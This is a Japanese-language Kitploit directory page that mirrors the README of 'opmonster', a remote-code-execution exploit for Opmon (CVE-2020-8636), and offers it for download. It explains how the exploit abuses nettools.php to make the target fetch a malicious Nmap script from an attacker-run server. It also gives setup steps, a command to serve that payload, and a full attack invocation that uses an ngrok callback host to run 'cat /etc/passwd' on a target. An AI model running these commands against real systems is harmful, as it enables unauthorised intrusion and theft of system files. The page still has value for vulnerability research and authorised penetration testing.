Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
opmonster — CVE-2020-8636 Opmon用の認証済みリモートコード実行エクスプロイト | Kitploit
ツール/GitHubGitHub/phor3nsic/opmonster
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 Opmon用の認証済みリモートコード実行エクスプロイト

リポジトリを見る
21ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

OpMonster

CVE-2020-8636 — Opmon 向け認証済みリモートコード実行エクスプロイト

概要 • インストール • 使い方 • ライセンス

language last commit license stars

OpMonster

概要

OpMonster は、Opmon 監視プラットフォームのリモートコード実行脆弱性である CVE-2020-8636 の概念実証エクスプロイトです。これは nettools.php エンドポイントを悪用します。このエンドポイントでは、任意の --script オプションを指定して Nmap を実行できます。このエクスプロイトは、Opmon にあなたが管理するサーバーから悪意のある .nse Nmap スクリプトを(http-fetch 経由で)取得させ、それを /tmp に配置した上で実行し、対象上であなたのコマンドを実行して出力を表示します。

発見・開発: @phor3nsic。 詳細: Opmon に関する 3 つの CVE。

インストール

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

使い方

まず、対象が到達できるホスト上で、生成された .nse スクリプトがダウンロード可能なディレクトリに Web サーバーを起動します(エクスプロイトはスクリプトをカレントディレクトリに書き込みます):

root@kitploit:~
php -S 0.0.0.0:1337

次に、4 つの位置引数を指定してエクスプロイトを実行します:

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
引数説明

対象がスクリプトをダウンロードしない場合("not vulnerable")や、あなたのサーバーへのアウトバウンド接続ができない場合、エクスプロイトはメッセージを表示して中止します。

免責事項

許可されたセキュリティテストおよび教育目的のみに使用してください。使用方法については、利用者自身が責任を負います。

ライセンス

MIT © phor3nsic

ツールをダウンロード
HOST対象 Opmon のベース URL(例: https://vulnhost.com)
LHOST.nse スクリプトを配信するあなたのサーバーのホスト
LPORTあなたのサーバーのポート
CMD対象上で実行するコマンド